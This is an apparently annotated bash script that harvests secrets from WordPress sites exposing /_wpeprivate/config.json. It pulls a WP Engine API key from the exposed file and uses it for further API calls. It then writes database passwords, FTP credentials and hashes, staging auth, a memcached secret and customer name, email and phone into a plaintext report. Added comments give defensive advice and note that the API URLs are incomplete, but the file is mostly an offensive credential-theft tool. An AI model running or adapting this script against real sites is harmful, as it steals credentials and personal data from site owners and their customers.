# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
#
# What the script does, as written: fetches $TARGET/_wpeprivate/config.json,
# pulls the wpengine_apikey and WPENGINE_ACCOUNT values out of it, issues two
# more curl requests that carry that key, and assembles a plaintext report from
# the two JSON responses.
#
# Defender's reading: every field reported below (db_password, ftp_users,
# nginx_basic_auth_staging, memcached_secret, customer e-mail/phone) becomes
# reachable once that one file is readable over HTTP. Deny web access to
# /_wpeprivate/, treat the API key and every credential listed here as
# compromised if the file was ever served, and look for requests to that path
# in access logs.
#
# NOTE(review): TARGET, BLUE, GREEN and RESET are never assigned in this
# listing; they have to come from the caller's environment. Unset colour
# variables simply expand to nothing.
# NOTE(review): no variable expansion in this script is quoted, so every value
# is subject to word splitting and globbing.

# Third '/'-separated field of TARGET; presumably TARGET is a full URL with a
# scheme ("scheme://host/..."), which makes this the host part -- confirm.
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
# -s silent, -o write to file, -k skips TLS certificate verification, so the
# content saved here is not authenticated. The exit status is not checked; a
# failed or non-JSON download still flows into the jq calls below.
curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json
# Text-scrapes jq's pretty-printed output instead of selecting the key in jq:
# takes the second whitespace field of each matching line, drops everything
# from the first comma on and strips double quotes. More than one matching
# line yields a multi-line value.
WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g')
# Same scrape for the account name; sort -u collapses repeated values.
# NOTE(review): this value comes from remote content and is used unquoted in
# every output file name below, so the response controls where files are
# written -- validate it before use.
ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u)
echo -e ${BLUE}"\n-------------------------- Make 1st API Call to -----------------------"${RESET}
# Prints the API key to the terminal (and to any captured output or log).
echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
# NOTE(review): the URL argument begins with $ACCOUNTNAME; the endpoint prefix
# appears to be missing from this listing, so the request cannot work as shown.
# The key is sent in the URL and sits in argv, where process listings expose it.
curl -so $ACCOUNTNAME-site.json -k "$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to -----------------------"${RESET}
echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
# Identical URL argument to the first call; only the output file differs.
# Presumably a different endpoint originally -- not recoverable from here.
curl -so $ACCOUNTNAME-customer.json -k "$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"
# The $(echo ...) wrappers are redundant; the variables could be used directly.
echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
# Everything from here on appends (>>) to $ACCOUNTNAME-report.txt in the
# current directory: repeated runs accumulate, the colour escape sequences are
# written into the file too, and the file ends up holding the credentials below
# in plaintext with whatever permissions the umask gives.
echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
# Matches any line containing "site" (key or value), keeps the text between the
# first and fourth double quote and strips the remaining quotes.
grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
# Joins jq's multi-line output into one line, strips { } " [ and spaces, then
# keeps what precedes the first ']'.
jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
# Unquoted command substitution: a value containing whitespace or glob
# characters is split/expanded before it reaches the file (same for every
# echo "key:"$(jq ...) line below).
echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
# The $'...' string expands to a sed script that replaces each comma with a
# newline; the second sed strips { } " and any remaining commas.
jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
# Flattens each ftp_users entry to "key:value" lines, drops blank lines and
# lines containing "value:", and breaks the line after each "path:".
jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt
echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
# Customer contact details from the second response; this is personal data and
# it lands in the same plaintext report.
echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
echo -e ${GREEN}
# Dumps the whole report, secrets included, to the terminal. The downloaded
# *-config.json, *-site.json and *-customer.json files are left on disk.
cat $ACCOUNTNAME-report.txt
echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}